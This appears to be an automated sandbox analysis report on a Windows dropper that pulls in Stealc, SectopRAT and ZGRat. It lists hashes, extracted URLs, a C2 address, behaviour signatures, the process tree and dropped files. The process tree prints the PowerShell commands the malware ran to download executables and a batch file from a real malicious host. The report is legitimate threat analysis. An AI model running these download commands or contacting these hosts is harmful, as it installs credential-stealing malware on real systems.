Analysis

  • max time kernel
    119s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28-04-2024 01:21

General

  • Target

    7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe

  • Size

    49KB

  • MD5

    705685a8deace858e7fc849471c045f3

  • SHA1

    10132365b465a6f231c8e292f462c2d005b4f9b0

  • SHA256

    7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9

  • SHA512

    b9dd7d5ca384ff4ad053d5f01d721f1180b1028e40c96cd94e04f2b2965e2f4be6cf4d2595f67c3e62039320b517e32200ffec165a9c544344d666732a57c56d

  • SSDEEP

    1536:XferrLkSRoe8C4UZsys0Dh1duFpyFI+Plt:Xfi3k+oWDBDh1duFpXWlt

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=1667

Extracted

Family

stealc

C2

http://185.172.128.62

Attributes
  • url_path

    /902e53a07830e030.php

Signatures

  • Detect ZGRat V1 3 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe
    "C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsy7CBF.tmp\lood.bat"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:944
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:752
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1636
      • C:\Users\Admin\AppData\Local\Temp\i1.exe
        i1.exe /SUB=2838 /str=one
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:572
        • C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
          "C:\Users\Admin\AppData\Local\Temp\ufw.0.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1632
        • C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
          "C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe
            5⤵
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:328
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2492
        • C:\Users\Admin\AppData\Local\Temp\ufw.3.exe
          "C:\Users\Admin\AppData\Local\Temp\ufw.3.exe"
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1532
          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2800
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2212
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=1667','i3.exe')"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2320

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Subvert Trust Controls

1
T1553

Install Root Certificate

1
T1553.004

Modify Registry

1
T1112

Credential Access

Unsecured Credentials

3
T1552

Credentials In Files

3
T1552.001

Discovery

Query Registry

3
T1012

System Information Discovery

3
T1082

Peripheral Device Discovery

1
T1120

Collection

Data from Local System

3
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    c735faf898918225eaaf94251a81ed15

    SHA1

    fadf5885dcf90dce782b384909a89c6aeede57e9

    SHA256

    e7819a037c7079f5eb9942599dd55a710748f7e75f4e2ee5f86052cf29e2a448

    SHA512

    b460f83477ac8807bac8c92c71acf886fde0b6923981cf59fa96c98c7ff04f6f2e7732939098151e813268d97ac472feb8d2a35501b1bbe0141ecbf357914c0f

  • C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\81950f7e7cbd108086cf2da3a401afdfffc60d9b485aac5dd52f7a137c00f950\2b7f7c33bd734341bf343695fe849958.tmp
    Filesize

    1KB

    MD5

    c46ed39cc1761b3f1db2ef34cbdaef01

    SHA1

    89dadbab3f1b4b5b1529e78371df7e69849312d1

    SHA256

    3037b509ee7ed08583de8526233c9cfd67ba102b1a8e96fc84f454b67a3d8cb1

    SHA512

    82417ff76c1ff25a318ca60004eea216b8248ab8888f01b013b19851cf707539cec33565794b733344b8a6d057c9d6364991d603e11893f27c6f35ce93ed21c5

  • C:\Users\Admin\AppData\Local\Temp\1ebc139a
    Filesize

    1.4MB

    MD5

    b9e1dc3641cb74ed0633561210fd7862

    SHA1

    c019ab6b2cbafa98539de387a3bd3a8f058bcf68

    SHA256

    2b35c8d463f1fe09c5de20478aff653e96c01e8261baa4be61cb9c8ec16b7970

    SHA512

    b597f9f9c8ee759133034e4c3f682d78db7780bd641787ace6a7e3c3709f480018ec54a3ea6659d30db1d0ebe598bab2dc40bfb207d7d37fb7af52e20fc8e341

  • C:\Users\Admin\AppData\Local\Temp\Tar81F5.tmp
    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Local\Temp\UFW1~1.ZIP
    Filesize

    3.7MB

    MD5

    78d3ca6355c93c72b494bb6a498bf639

    SHA1

    2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e

    SHA256

    a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001

    SHA512

    1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

  • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
    Filesize

    2KB

    MD5

    4978aebe3b47dbe2dc682524251bf182

    SHA1

    5caf8904debf79fc69eac04680b5203851d462a0

    SHA256

    6e0871d2ff7b7795686d230c054b2285c2c0c28ef9f4a3c0f0573b18dab40c7a

    SHA512

    8410c75818c35e56eb0a148f39b2843f2a5528672d0ee1bf27d93a80707eb9b474db7733603190babd9fdd84b8ae840887e9f7ed605d657ba4690ecff36c24aa

  • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
    Filesize

    3KB

    MD5

    33592882a13cc34ba6fa816ba5924c03

    SHA1

    c81771a90391e3e187f7a7d4352ac74c12b0d7e2

    SHA256

    ee79e2fe9637793cffc06c535403ffb032ac5203d2863b267e0067c5504897b7

    SHA512

    2c0619c8236b8a5793f277d20a1420dfd1ef6cfa07922398f76598452b90605b99de927c1d1f50583992540af1a03cedacec2ae6938740308531e0734266c870

  • C:\Users\Admin\AppData\Local\Temp\nsy7CBF.tmp\lood.bat
    Filesize

    694B

    MD5

    75599c4a0c50b789c306880785ffa782

    SHA1

    31bb898b645b5616b2adf0a4718a9f24ce28e1c1

    SHA256

    fe26f8ca5512caeff7dffd12c2ffc11115850db0764a3ef9f943fa9f349e0a77

    SHA512

    b9ea2629a7f212aab59cb7a8bfdb684b1f23086b488b2a28b25784ad629c42dd8e71b4ef4927728df436a53c2f94d66013a166a407bcbc5dd6570c3b03fb31ad

  • C:\Users\Admin\AppData\Local\Temp\tmp5571.tmp
    Filesize

    20KB

    MD5

    c9ff7748d8fcef4cf84a5501e996a641

    SHA1

    02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

    SHA256

    4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

    SHA512

    d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

  • C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
    Filesize

    226KB

    MD5

    f85ca7da4201921c93b98f6555f3d7b7

    SHA1

    523891e3e23bb45a52e402b6282f70f9e17cde9c

    SHA256

    eeaa177b0bc2d85cf8b416c2ed3b85fd50bd7c811bf41a32d161a10a767c2fda

    SHA512

    1b8220fe954799fbc43a702a1c508beff390c3f5a58e8e50e3c5ccce48459ec3a25df395f041f722cb67b0eb6c31013239f58a8b947e60344d15ce0c56e9cb17

  • C:\Users\Admin\AppData\Local\Temp\ufw.2\UIxMarketPlugin.dll
    Filesize

    1.6MB

    MD5

    d1ba9412e78bfc98074c5d724a1a87d6

    SHA1

    0572f98d78fb0b366b5a086c2a74cc68b771d368

    SHA256

    cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15

    SHA512

    8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

  • C:\Users\Admin\AppData\Local\Temp\ufw.2\bunch.dat
    Filesize

    1.3MB

    MD5

    1e8237d3028ab52821d69099e0954f97

    SHA1

    30a6ae353adda0c471c6ed5b7a2458b07185abf2

    SHA256

    9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742

    SHA512

    a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

  • C:\Users\Admin\AppData\Local\Temp\ufw.2\relay.dll
    Filesize

    1.5MB

    MD5

    10d51becd0bbce0fab147ff9658c565e

    SHA1

    4689a18112ff876d3c066bc8c14a08fd6b7b7a4a

    SHA256

    7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed

    SHA512

    29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

  • C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
    Filesize

    2.4MB

    MD5

    9fb4770ced09aae3b437c1c6eb6d7334

    SHA1

    fe54b31b0db8665aa5b22bed147e8295afc88a03

    SHA256

    a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3

    SHA512

    140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

  • C:\Users\Admin\AppData\Local\Temp\ufw.2\whale.dbf
    Filesize

    85KB

    MD5

    a723bf46048e0bfb15b8d77d7a648c3e

    SHA1

    8952d3c34e9341e4425571e10f22b782695bb915

    SHA256

    b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422

    SHA512

    ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    b4ee2d226ec2f920234ac360e43e08a7

    SHA1

    2e76a2232744732f9c524e7958e33c721e69e036

    SHA256

    b2715705a557de76fc29b054704e933e4d0d3ad5464b78a7ffc05e0c6df531be

    SHA512

    aae23494fa5d99bb7abda9f18734f6e061b46f79cc89938cf58a5d4a7c7c4d88df84aa44b37056bd8fa0dde2b033a0409e24f471e404521f4890eb7d4cb0cc18

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \ProgramData\mozglue.dll
    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

  • \ProgramData\nss3.dll
    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

  • \Users\Admin\AppData\Local\Temp\i1.exe
    Filesize

    452KB

    MD5

    fdd3895eb388f733e4aabd00db54e6f7

    SHA1

    604978bd31d87066735e13343f26f80ce7f45706

    SHA256

    303ba93e0bb762a95859f5c94016e7cda0ace2fba811fb78e86af98baa2f3d01

    SHA512

    6b891f36976ec4f5bd8590215f191c43e93f69c19a83f2eab44ef5b2d17fbecc5531a05c2137c97164f0917bf5a0d41cb245760eb1544d83fa212d4a1d806756

  • \Users\Admin\AppData\Local\Temp\nsy7CBF.tmp\INetC.dll
    Filesize

    25KB

    MD5

    40d7eca32b2f4d29db98715dd45bfac5

    SHA1

    124df3f617f562e46095776454e1c0c7bb791cc7

    SHA256

    85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9

    SHA512

    5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

  • \Users\Admin\AppData\Local\Temp\ufw.3.exe
    Filesize

    4.6MB

    MD5

    397926927bca55be4a77839b1c44de6e

    SHA1

    e10f3434ef3021c399dbba047832f02b3c898dbd

    SHA256

    4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

    SHA512

    cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

  • memory/328-526-0x00000000745E0000-0x0000000074754000-memory.dmp
    Filesize

    1.5MB

  • memory/328-424-0x0000000077B30000-0x0000000077CD9000-memory.dmp
    Filesize

    1.7MB

  • memory/572-385-0x0000000000400000-0x0000000001A3C000-memory.dmp
    Filesize

    22.2MB

  • memory/752-162-0x0000000002590000-0x00000000025D0000-memory.dmp
    Filesize

    256KB

  • memory/1532-489-0x0000000000400000-0x00000000008AD000-memory.dmp
    Filesize

    4.7MB

  • memory/1532-487-0x0000000000400000-0x00000000008AD000-memory.dmp
    Filesize

    4.7MB

  • memory/1632-486-0x0000000000400000-0x000000000083A000-memory.dmp
    Filesize

    4.2MB

  • memory/1632-423-0x0000000000400000-0x000000000083A000-memory.dmp
    Filesize

    4.2MB

  • memory/1632-514-0x0000000000400000-0x000000000083A000-memory.dmp
    Filesize

    4.2MB

  • memory/1632-348-0x0000000061E00000-0x0000000061EF3000-memory.dmp
    Filesize

    972KB

  • memory/2492-545-0x0000000000400000-0x00000000004C6000-memory.dmp
    Filesize

    792KB

  • memory/2492-539-0x00000000730B0000-0x0000000074112000-memory.dmp
    Filesize

    16.4MB

  • memory/2492-540-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
    Filesize

    4KB

  • memory/2492-541-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
    Filesize

    4KB

  • memory/2612-414-0x00000000745E0000-0x0000000074754000-memory.dmp
    Filesize

    1.5MB

  • memory/2612-341-0x00000000745E0000-0x0000000074754000-memory.dmp
    Filesize

    1.5MB

  • memory/2612-342-0x0000000077B30000-0x0000000077CD9000-memory.dmp
    Filesize

    1.7MB

  • memory/2800-523-0x000000001F280000-0x000000001F2FA000-memory.dmp
    Filesize

    488KB

  • memory/2800-534-0x0000000000F10000-0x0000000000F32000-memory.dmp
    Filesize

    136KB

  • memory/2800-521-0x000000001E600000-0x000000001E62A000-memory.dmp
    Filesize

    168KB

  • memory/2800-524-0x0000000000EB0000-0x0000000000F12000-memory.dmp
    Filesize

    392KB

  • memory/2800-525-0x0000000000A20000-0x0000000000A2A000-memory.dmp
    Filesize

    40KB

  • memory/2800-520-0x0000000000F40000-0x0000000000F4A000-memory.dmp
    Filesize

    40KB

  • memory/2800-530-0x000000001F850000-0x000000001FB50000-memory.dmp
    Filesize

    3.0MB

  • memory/2800-532-0x0000000000A40000-0x0000000000A4A000-memory.dmp
    Filesize

    40KB

  • memory/2800-533-0x0000000000D30000-0x0000000000D3A000-memory.dmp
    Filesize

    40KB

  • memory/2800-522-0x000000001F1D0000-0x000000001F282000-memory.dmp
    Filesize

    712KB

  • memory/2800-537-0x0000000000F30000-0x0000000000F3C000-memory.dmp
    Filesize

    48KB

  • memory/2800-519-0x000000001E5D0000-0x000000001E5F4000-memory.dmp
    Filesize

    144KB

  • memory/2800-518-0x0000000000A50000-0x0000000000A64000-memory.dmp
    Filesize

    80KB

  • memory/2800-517-0x0000000000D40000-0x0000000000D4C000-memory.dmp
    Filesize

    48KB

  • memory/2800-516-0x0000000000470000-0x0000000000480000-memory.dmp
    Filesize

    64KB

  • memory/2800-546-0x0000000000A40000-0x0000000000A4A000-memory.dmp
    Filesize

    40KB

  • memory/2800-515-0x000000001ECE0000-0x000000001EDF0000-memory.dmp
    Filesize

    1.1MB

  • memory/2800-504-0x0000000000F50000-0x0000000004848000-memory.dmp
    Filesize

    57.0MB